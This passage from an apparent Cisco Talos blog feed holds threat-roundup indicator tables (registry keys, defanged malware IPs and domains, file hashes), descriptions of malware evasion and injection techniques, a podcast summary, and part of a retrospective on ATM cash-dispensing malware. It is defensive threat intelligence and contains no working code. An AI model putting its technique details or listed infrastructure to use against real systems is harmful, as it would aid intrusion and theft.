`\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==`	9

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`107[.]165[.]236[.]233`	24
`45[.]39[.]189[.]31`	24
`154[.]90[.]68[.]52`	24

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`www[.]af0575[.]com`	24
`www[.]fz0575[.]com`	24
`www[.]wk1888[.]com`	24

Files and or directories created	Occurrences
`%SystemRoot%\XXXXXX579E5A5B VVVVVVrr2unw==`	24
`%SystemRoot%\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe`	24

File Hashes

05866fb33429838331d475305f0b208d9aba77147dbf3010dd5c1ed502aed237
1bc0cc8e902068bced4d8a5a3995996e4004aaf4f7f7d472a137ead9d9531f6a
7ba1eaf4a7b6298ea88d653015a586daedef1931b868d72067919b85f09192e3
a02b367269e6a04ff08f088f372dba36289890cb0ac0200ece43d9eb76f8fffa
b52acfe618192ea2c16518b22b565adae69496dce66e0fa344cf3c3c343d531d
b78f867b6c84795c7b1aba7e607ecea8ebbb2e05c72c4c6118bf2c73fc582641
b80a7942deb3a734e54a3e55e01fd5c8b548c8c263423861e8293d64358f8dd0
c2db0b91efc4d4d6f7f6b8261fbf87502234d8dddfee28d1fb3f3a0aa9036aa3
c4e18af265e4a04ef594e8eb4272e06a4d2d17b711318ed87e92e023e1e93cca
c7df429173e8ea67d0d6db359b4bb591b63d605e308c9e5782e98bc859dde11a
cdd73dcea4ebab00fef66f15eb816c35abebe2cabbd6c1083134c5f00604fa1b
d100a56dc5beb1b8e0cb061d8eac0ec7d9a38d59c9494e4b54cd9347c1d3990f
d19888826f2bc2c913123848d16a33ad2e4c2816926e2eb2b0d2b0b7e07ea743
d2963a935336cae74222b86b3cea3746b661b6cc2856b18ae90950f4074eb809
d4412464d02bbfe2e9594988854e14af082ee7a9ae3523839f333fdcf53aa338
d453f0d4bade25d5f69227940a93d1bda71708160ef2abdf395572a7a1092865
d505c38f3fea2def0c138cdac765458439f4d6485f5d4958b78c275a16bb1f6e
d6cdaf52318fbd8a246b229130c9f0f65a2f47825f69110ddac6466651c2ee78
d84754b76bea45d66d81d7e9b21508cd0444166d972ebed290e6579b9232500b
d8ed266a2992c92c6cdb8c091347fa914c0f6329bb7d1b7a534608780bafb34d
dad1288296135661b94cbd1d330c89664c60d6e62eb401aae07153d0a833a5bb
db3236cbfbbb26811e79d0c406d69b0c07d90bb757fc167815187c7880049a2b
dd90a85a837547695bb16b420c60f0736ce2d941f39f89a2784a26d3a69fd137
de92f9212a5cef7538654b04e0c12939ef29bbed1899346130b934e05eb74a1a
e07953b5a16b4a232dcd0029f277290114c10d17bfaf85c1743dc6a0fa6b1583
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Packed.Shipup-6973041-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: LoadAppInit_DLLs`	32
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: AppInit_DLLs`	32

Mutexes	Occurrences
N/A	-

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
`%ProgramData%\Mozilla\thfirxd.exe`	32
`%System32%\Tasks\aybbmte`	32
`%ProgramData%\Mozilla\lygbwac.dll`	32
`%HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll`	31
`%HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe`	31
`%SystemRoot%\Tasks\kylaxsk.job`	31

File Hashes

052547bc8db09ae2df36819ad53a4174d593082c4a416d06a09e40598163c318
052d32680a239673a9972d09723fdd4f75ea05af4671d971031bbc48d6da9501
0e841ddbe5a8ea180d0e3ca81cb3d88fe9a78b5ab04f9374220c82a4f9a7ab46
0ecb413195e8be913236983ef106a90197f815ecfbd94d78dafadefd37025628
13ca3ebbaf2c837078de5a6bbc8de54c8cf3762f7ece550f8066df6523ab6c96
13e9aa44c96f7eb8272d232924facc85c184329e2a776f627a49af9a00f5ac95
15e2fa7064464e8e3b9a1ec51d032e8170084c9e232396e649f0e8bdc8e6b9b0
15f9e930562516a455a50ccab4b413121dd1f5dae7ed7ebbf777bbf9c6d3ce43
179405e24adc742b476282a1849f96de091a92bac7f1fa5399750c74089f706b
3e8d09e57b8b169940c173c76c36cb6306ad194be51b568829afda9abe5c9dac
437028671afa7e4b26814fad641b8f8b59bdb8ab838461ffc359c8fb1ba6505c
44628bc60cf2fcbb774b7102add73b0ec05c90db6a5c0a51e58a2b8b03187ce9
4f4eed8ad44a81f5bcea4956c17793c467d2f35d751bd3d5041bdb02173dceef
5ca3a2ff96cc24eb5c555ccb2c5fa22b86248f742ce3c6e0c930a57f530a5558
607ca3c1344a6dca8a0df8ca61924247f5d7abe5fb082546e66282a85a463d83
77b1590916699002e1211803f858749dfe258de2faeba7cb33da399992a7a021
7c81845b0a79769bd476c01a51cfb1f10774be0e082ed52b431899e5756810e3
7ed507a6eb3af46b6c14c91772fce87c6968d025ad4a8747963fc5ae8205dde2
842a281a82d966ec59f255326ab5a37fdeff6028d59a164fd00de8c77dc5146c
889284a84faf65ba6ef4295f35dd6aa3c524965226c725337639e62dd17c0d78
9f2f173a793d3e02f67047c09e3e5680b017eecc9a2ecef2269cf72a3e6e2801
a662fcb03c1837ddbb13b145e7f1236a2839c25c7bbf30afb11836b5a01cf5a7
b69fb1c8cfc8cf49b20f00591ff647e4629370f68010e6f0900d5266817d0bcc
cb8365c6b74023800369bd87743d23c481adc2f8965b8b2e1c0e4ee6074d2f30
dc45c478635d4bd2b242dbd49218aeeafb3e3a92e10edf4417c46c48a49f54a5
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Ransomware.Razy-6972250-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\Software\zzzsys`	29
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLinkedConnections`	29
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: aroinics_svc`	29
`<HKCU>\SOFTWARE\ZZZSYS Value Name: ID`	29
`<HKLM>\Software\Microsoft\DownloadManager`	2
`<HKCU>\Software\DCAE84951C1ABA1`	1
`<HKCU>\SOFTWARE\DCAE84951C1ABA1 Value Name: data`	1
`<HKCU>\Software\1CB360B14DD9DEE`	1
`<HKCU>\SOFTWARE\1CB360B14DD9DEE Value Name: data`	1
`<HKCU>\Software\4A8D80F87D78C75`	1
`<HKCU>\SOFTWARE\4A8D80F87D78C75 Value Name: data`	1
`<HKCU>\Software\3C10A2EC8C6F11A3`	1
`<HKCU>\SOFTWARE\3C10A2EC8C6F11A3 Value Name: data`	1
`<HKCU>\Software\B23F47051906EBA`	1
`<HKCU>\SOFTWARE\B23F47051906EBA Value Name: data`	1
`<HKCU>\Software\EDF09EC2BB87785A`	1
`<HKCU>\SOFTWARE\EDF09EC2BB87785A Value Name: data`	1
`<HKCU>\Software\43A7BE96FA393A15`	1
`<HKCU>\SOFTWARE\43A7BE96FA393A15 Value Name: data`	1
`<HKCU>\Software\B26B751ACE1935`	1
`<HKCU>\SOFTWARE\B26B751ACE1935 Value Name: data`	1
`<HKCU>\Software\2B359187F23A1A5`	1
`<HKCU>\SOFTWARE\2B359187F23A1A5 Value Name: data`	1
`<HKCU>\Software\66655966ACCADC47`	1
`<HKCU>\SOFTWARE\66655966ACCADC47 Value Name: data`	1

Mutexes	Occurrences
`\BaseNamedObjects\345432-123rvr4`	29

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`204[.]11[.]56[.]48`	29
`97[.]74[.]249[.]1`	29
`23[.]225[.]15[.]164`	27
`204[.]79[.]197[.]200`	11
`13[.]107[.]21[.]200`	8
`88[.]99[.]146[.]131`	2

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`en[.]wikipedia[.]org`	29
`www[.]torproject[.]org`	29
`rbg4hfbilrf7to452p89hrfq[.]boonmower[.]com`	29
`sappmtraining[.]com`	29
`multibrandphone[.]com`	29
`vtechshop[.]net`	29
`controlfreaknetworks[.]com`	29
`tele-channel[.]com`	29
`shirongfeng[.]cn`	29
`irhng84nfaslbv243ljtblwqjrb[.]pinnafaon[.]at`	24
`t54ndnku456ngkwsudqer[.]wallymac[.]com`	24
`bfd45u8ehdklrfqwlhbhjbgqw[.]niptana[.]at`	5
`kh5jfnvkk5twerfnku5twuilrnglnuw45yhlw[.]vealsithe[.]com`	5

Files and or directories created	Occurrences
`%HOMEPATH%`	29

File Hashes

1905c1e8b2d6c268f627e8dbc059555510cbe2871ad529894e8d6353418a05ab
22957751bc62369fd5349c30bfa365ea37b8e132af29abd40a3b920f47b6eb32
2c6da4b5560472d787e4fdf7ae5f40e28d4fbf31648874d30b3ee62f6f94d621
45cfcd5fc1d12f0b8c5ecd100f9b2d7e537a3804605337e581b2e6f7d8769662
4955d9cb5931f433c3e52b30c6089e5466af4da52eec32842115a169b7a0d5d4
751a1db3495b1c2d385b4ceaf33a4051a7fcdc3fb93b306fdbe1f6b143694db5
937e5573b147a897e27aba03bc8e21c3e4e32b89e4c596bf5a1b65eddafe88cd
939e5d2051e8e0256d39f1c55f847831f9de1b140fc8581edd324f5ae08c26b8
94dbe3111292115fc9ec7616ff8c32f636315f2589b05292e32f8bf4da42757d
a2be2b0912b691d4c3d85f458b6e01228680df6d0d7ec2820467fc8794b0bab0
a76170367b5a5b49eed6c02bfe35d62506781fb25abd42f151a088b39526cc76
aafa9d17e3e276c0d3ebbca2d7f9b51e658ee19181543f57029da7f0ecb16c85
aba204cbd49df46ca1a1bce301de80cdf85440928a70207a35df3768eca2ba03
ae5f00f552b48e9d4ab11ec2c110ec7d2040f638507e074fc59e8e6f195a9e96
b4d601ff6d892011692e72b14fa102f674015b6f673bb67ddb6ce299f5fc0225
b4f43a3b21f24af7639f8d505a729fd063ea617efe5e2bf3d1b7cfc972a1174c
b719d46aa7b9a2af7164e4b2b50bb6fb569405c11d65c3d79715b56eba30abe8
b81df15c1e85bfbd32732e1415b88534d30949030da784d44094bc464e784929
ba784059fa75fa4669b0bdf1f9c37846b72dbc475fd616e3d919da320585bb26
bdbc5002551f35b9828206efe63775cda2a3b0ddc0b1a3cea69712645acae9f6
c1200ec3e6d577abbdf3ffa675c0c5a74c19404b48f17c7a9575e52f9f587fdd
c29e65f5d0a286c4a6200eff1243110665b50225a60f293ad3993a4433f75eab
ca3857d4f20eb830c5d281b36fb5cfa9e1dc3195e07763d8541d4782a297cb41
d27199f85f5225fd359532c6f72d82d86d54c4a9eb2094ea1987701cce9a13d2
d2c51c28a29b7188d7597867ecf3b46d6c680f3fc5b08d1b62b11d7e35f7c432
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Malware.AutoIT-6974564-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: Load`	23
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgui.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgcsrvx.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgidsagent.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgrsx.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avgwdsvc.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\egui.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\zlclient.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\bdagent.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\keyscrambler.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\avp.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\wireshark.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\ComboFix.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MSASCui.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MpCmdRun.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\msseces.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MsMpEng.exe`	20
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRUI.EXE Value Name: Debugger`	1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVASTSVC.EXE Value Name: Debugger`	1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCONFIG.EXE Value Name: Debugger`	1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVASTUI.EXE Value Name: Debugger`	1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVSCAN.EXE Value Name: Debugger`	1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\INSTUP.EXE Value Name: Debugger`	1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MBAM.EXE Value Name: Debugger`	1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MBAMGUI.EXE Value Name: Debugger`	1

Mutexes	Occurrences
`a6aa8a0b-6e56-4c3b-907b-050c9f3cd849`	23

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
`%TEMP%\AppVShNotify`	23
`%TEMP%\AppVShNotify\adsldpc.exe`	23
`%TEMP%\tmp1.tmp`	19
`%TEMP%\9820e8a7-0923-3042-c2a0-c5f11027aa0c`	1
`%TEMP%\e2fa612d-1e2f-35b5-a199-944faa71010b`	1
`%TEMP%\6b2d093a-7df5-80b3-3f99-4e2c9f1b13c8`	1
`%TEMP%\4f2d29d3-fbde-e6ff-ad4a-df0b85cdeddd`	1
`%TEMP%\fe5fdbd7-d952-2867-3827-7057bc588851`	1
`%TEMP%\c457fd8a-143f-203d-0170-439f7c58973c`	1
`%TEMP%\914c8aee-d3ec-de0a-1145-f7bddaa17f99`	1
`%TEMP%\ee04db46-f4ea-7f77-8bbc-01f32a7cc91d`	1
`%TEMP%\8b20e715-a03f-4588-1643-683c4f1c2815`	1
`%TEMP%\30c2a40c-4fe5-ce75-1ced-261814da72b9`	1
`%TEMP%\295bf3aa-19e0-3c5a-0683-f84fd23e5863`	1
`%TEMP%\159f88b1-1b0a-90f0-8fdc-216ce2a76423`	1
`%TEMP%\1781907d-118d-abbc-e63c-ffefec1db0fe`	1
`%TEMP%\ac2f593e-117e-d2e9-5326-7e5853e9a327`	1
`%TEMP%\b60fdf77-11cd-a028-be3d-31ad857bb8ca`	1
`%TEMP%\f1d8b9f0-0a08-9f11-7bf2-beb0259e0aba`	1
`%TEMP%\39fd9262-2c05-b304-c2e3-82be0f250151`	1
`%TEMP%\6db51643-db24-1925-0a44-6ec878aba104`	1
`%TEMP%\f7913a71-88aa-05ca-5d01-f9cd8ec5cf3e`	1
`%TEMP%\c0ebfd8e-41db-b5f8-8907-2aad802486f9`	1

File Hashes

13d1d9eeba3a08a30db5812b628d1c68fb87b2c320260850a32d37fdc45de2ee
2d63201ae10bef24d9a28f054a504a4f4d7c5992656fccd2bc22a4515fa6b820
2e1b4c9c33da8a159915d696e24cc658f98ef9793b80ddfc9ca7827cd00af279
3e3c18e431e5782e8576766b9c3c8dbcf2e00eb5fb252b090fb5becd997004d7
4670ed1f97a6c49498dc49f996daa8570ccdcd07922bfdacd3230861aec54a0a
4ffd29b36c3059b81555f7dbb11e2e03b56b31a31f644e8d2267a1ef6d3229b2
56ebb8570a0f3490449c95e1285d36ca87801f0a044f262aceac90c7e2dfe7f3
714d4ef7cf6fad145d2e3bfa069957c4cc5ee6b3cd471e9ed8e64b7bbbb98369
840c394f5562db9be1291578d19ba069016a62551ac15d5d062ad5623a0bc5e3
8b568da7e24bef7371551c0a2541cbcf90294af04e4d99c196717d5473e399a3
8ec63eae66ac11026ca51828206a784bcb5bc5c87f33e455ade4ac4c5d7c875e
95ae77952c43bb538baf4f704e588b8ec229a3a116254d902b89a3dc999561da
9b9aff6df6f3f71722a0499119b1b32d6d8f66f7a84dc71228395040d587d43e
9df3b3b9eb5cd86fb0e56ae740c158b25fad2ce7936d266b83073f8021d032fe
a5e7b3a7b85e1c3f8a084e7d3a476c7bf04704200e6bd2e0b7975f830079673f
adeb18901edd0593719d05183644231b9da920db4ba640e7463ee4d4af6a68bd
b625c7a83fa0235a74106792181e684df7f109cf0d5123a95368fc649fb57862
bd949d0e8de9b1544505ee8a0bd18bfd438ec75652e6cf17c057062c798d7b44
c46563e9052f35a23b4ce4242fadf2e04edb038010ed7b49c5caab607199c59a
da9b5f246510d2751970cbbda141c6319feb58fb105c5235b40ce88c0385fea4
dd2343c12228a08717b9d4041c696b958d9d673b9a1f4894db4fd679e386e00d
ea03c2e4ed78fb0f2789d28b3ac5d2041bea1fd9cc576db83e7a1b9893b890c3
eea28710d09c0e9776bb877baa9a78a90286f38b3b947527cc4950b28d582829

Coverage

Screenshots of Detection

AMP

ThreatGrid

Exprev

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Madshi injection detected (3672)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected (2773)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
PowerShell file-less infection detected (1849)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
Process hollowing detected (255)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Gamarue malware detected (186)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Suspicious PowerShell execution detected (151)
A PowerShell command has attempted to bypass execution policy to run unsigned or untrusted script content. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Excessively long PowerShell command detected (69)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Installcore adware detected (43)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Atom Bombing code injection technique detected (39)
A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
Corebot malware detected (34)
Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.

↧

Beers with Talos Ep. #54: Patch after listening, RDP and wild 0-days

May 29, 2019, 12:19 pm

≫ Next: 10 years of virtual dynamite: A high-level retrospective of ATM malware

≪ Previous: Threat Roundup for May 17 to May 24

Beers with Talos (BWT) Podcast Ep. #54 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded May 24, 2019 — There is another Blue(X) to talk about and guess what? YES, YOU STILL NEED TO PATCH. We talk about RDP, the source of this vulnerability and whether or not exploits exist for it (hint: they do). There is a quick look back at last year on the anniversary of VPNFilter, and we also tackle zero-days again through the lens of Project Zero’s timeline of zero-days found in the wild.

Also, Craig hasn’t seen the end of "John Wick 3" yet, so feel free to tweet him spoilers. If you are in San Diego for Cisco Live two weeks from now, come find us to see a live recording of the podcast!

The timeline:

01:00 — Roundtable: The Dark Times, it’s not what you THOT, and deducing a new baby’s name
13:00 — Happy birthday VPNFilter, I didn’t get you anything and I’m not sorry.
18:00 — RDP and BlueKeep: Really Do Patch. Stop, go do it. Blah blah blah, not listening. Go patch.
29:00 — Zero-days: The amount of time a patch has been available any exploit, and/or since machines have made an attempt on Craig’s life.
38:30 — Project Zero Timeline of zero-day found in the wild
47:30 — Parting shots, closing thoughts

Some other links:

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).

Hosted by Mitch Neff (@MitchNeff).

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

↧

10 years of virtual dynamite: A high-level retrospective of ATM malware

May 30, 2019, 9:47 am

≫ Next: Threat Source newsletter (May 30)

≪ Previous: Beers with Talos Ep. #54: Patch after listening, RDP and wild 0-days

Executive summary

It has been 10 years since the discovery of Skimer, first malware specifically designed to attack automated teller machines (ATMs). At the time, the learning curve for understanding its functionality was rather steep and analysis required specific knowledge of a manufacturer's ATM API functions and parameters, which were not publicly documented.

Before the discovery of Skimer, anti-malware researchers' considered ATMs secure machines containing proprietary hardware, running non-standard operating systems, and implementing a number of advanced protection techniques designed to prevent attacks using malicious code. Researchers eventually discovered that the most popular ATM manufacturers use a standard Windows operating system and add on some auxiliary devices, such as a safe and card reader.

Over time, actors behind some of the newer ATM malware families such as GreenDispenser and Tyupkin realized that there is a generic Windows extension for Financial Services API (CEN/XFS) that can be used to make malware that runs independent of the underlying hardware platform, as long as the ATM manufacturer supports the framework. This malware can trick the machines into dispensing cash, regardless of whether the attacker has a legitimate bank card.

ATM malware has evolved to include a number of different families and different actors behind them, ranging from criminal groups to actors affiliated with nation states. The significance of ATM malware stems from the fact that it can bring significant financial benefits to attackers and as a consequence cause a significant damage to targeted banks, financial institutions and end users.

Now that this type of malware has been around for more than 10 years, we wanted to round up the specific families we've seen during that time and attempt to find out if the different families share any code.

ATM malware overview

Significance

ATM malware provided criminals with a subtler alternative to physically breaking into the safe built into the ATM. Before the appearance of ATM malware, criminals typically had to employ traditional ways of robbing ATMs, often pulling the physical device out of the ground or blowing it to pieces with dynamite. Obviously, these methods would quickly draw the attention of law enforcement and passersby.

Over the past 10 years, we have seen a steady increase in the number of ATM malware samples discovered. Still, the number of discovered samples is very small compared to almost any other malware category.

Number of ATM malware samples discovered year over year based on the year of first submission to VirusTotal.

As a digital substitute for dynamite, ATM malware allows criminals to employ money mules and instruct them how to dispense money from targeted ATMs. Typically, it happens by supplying a special authorisation code or card created to authorise the transaction.

Before that, criminals had to infect the targeted ATM to install the code, which more often than not meant that they had to physically open the device to access its optical media reading devices or USB ports.

There have been many reported attacks on various banking organizations throughout the world, but they seem to be more prevalent in Latin America and Eastern Europe, where the ATM infrastructure is older and are not regularly updated with security software or tamper-proof sensors. The damage caused by ATM malware to banks and individuals is rarely disclosed but it likely reaches millions of dollars a year.

ATM malware affects banks and other financial institutions, as well as the reputation of ATM manufacturers and individuals and companies whose account details are stolen in ATM malware attacks.

Classification

There are several different ways we can classify ATM malware families. Based on its functionality, we can classify ATM malware into virtual skimmers and cash dispensers. The purpose of skimmers is to steal card and transaction details and individual PINs if the encryption keys used by pin pad are successfully retrieved.

Cash-dispensing malware uses functions to allow for so-called "jackpotting" of ATMs where money is dispensed by attackers without the authorisation from the bank. But there are malware families that can steal card details and dispense cash.

As far as the installation process is concerned, we again have two major groups. The first one requires the attacker to physically access the device. The second group assumes that the attacker installs malware indirectly, typically by compromising the internal network of the bank and then targeting ATMs using stolen credentials.

These types of malware will also either target specific models of ATMs, or will be more generic. Recently, ATM malware typically deploys generic functions.

The most common framework is the CEN/XFS framework, which allows the developers of the ATM applications to compile and run their code regardless of the ATM model or the manufacturer but there are others, such as Kalignite framework built on top of XFS.

The XFS API contains high-level functions for communicating with the various ATM modules such as the cash dispensing module (CDM), PIN pad (EPP4) or printer. The high-level functions are provided through a generic SDK, while the lower level functions, supplied through service providers, are developed by ATM manufacturers. The architecture is quite similar to Win32 architecture where the developers use the high-level API to communicate with the OS kernel and various device drivers provided by the manufacturers of the individual hardware components.

High-level CEN/XFS architecture.

Most ATM samples require physical access to the targeted ATM. ATMs are not typically connected to the internet and communicate with bank's central systems through specialized lines. However, most of the ATMs are connected to internal networks for their maintenance and administration so the second, smaller group of ATM malware may be introduced by compromising the internal network first. This technique requires a higher level of sophistication but potentially brings higher returns if successful.

Some generic hacking tools, such as Cobalt Strike, have reportedly been used for attacking ATMs and the transaction systems. This method has been more commonly used by more advanced groups such as Carbanak, Cobalt Gang and Lazarus (Group 77), whose Fastcash attack affects IBM AIX operating system, which is rarely targeted by malware.

Notable ATM malware families and their functionality

Over the past 10 years, we have seen more than 30 different ATM malware families. In this section, we will briefly describe some of the more notable ones.

Number of ATM malware samples per family.

Ploutus

Ploutus is the malware family with the largest number of discovered samples. The majority of them having been reported in Mexico. Ploutus is a standard ATM-dispensing malware. The attackers need to be able to access physical ports or a CD-ROM drive to be able to boot from it and modify the ATM system image to install the malware.

Attackers allegedly used newer Ploutus variants to attack some U.S.-based ATMs. Ploutus.D communicates with the ATM using the multi-vendor KAL Kalignite framework, which allows it to work with ATMs from different vendors with minimal changes to its code base.

One of the Ploutus variant's interface.

Skimer

Skimer is one of the first ATM attacks, and bears all of the features of well-developed malware. Skimer functions as a virtual skimming device that attempts to steal bank card numbers and details of the account and owner details stored on the magnetic stripe tracks 1 and 2. A recent review of its functionality also indicates that it may also attempt to steal users' PINs by retrieving the encrypted pin pad encryption keys from the system.

Apart from the virtual skimming function, Skimer acts as a backdoor to the ATM functionality for its operators — money mules employed to collect stolen data and dispense cash.

Main code loop for servicing Skimer's operators with cash.

If the user knows the secret code to activate the backdoor, the malware displays a menu, which allows the operator to empty one of the four cash-dispensing modules (CDMs).

The code locking the dispenser module and dispensing cash.

Most of the other ATM malware families follow a similar principle. The attackers need to be able to physically access the ATM, which requires a key or drilling a hole to access specific ports or devices. Once the malware is deployed, the money mules need a specific code to access the menu and dispense cash.

Tyupkin (Padpin)

The most interesting characteristic of Tyupkin is that it has the ability to limit its operation to specific hours and days of the week. It was reported that some Tyupkin instances can only be used on Sundays and Mondays at night.

Tyupkin function for checking the hours of operation.

Before dispensing cash, Tyupkin disables any network connections, presumably to prevent administrators from shutting down the ATM if a suspicious activity is detected.

Some members of Tyupkin family are developed using C# and the .NET framework and some using Microsoft Visual C++. The family uses XFS API to manage infected ATMs and dispense cash in multiple currencies. Tyupkin has been active since 2014 and the associated gangs reportedly target Eastern European countries.

Alice

Alice follows a similar pattern to other ATM malware. It is installed by attackers and requires physical access to the system. When the operator launches it, Alice displays a window requiring a PIN.

First Alice screen.

If the code is correct, Alice will access the dispenser module and allow the operator to retrieve cash.

Main Alice UI window.

Cutlet

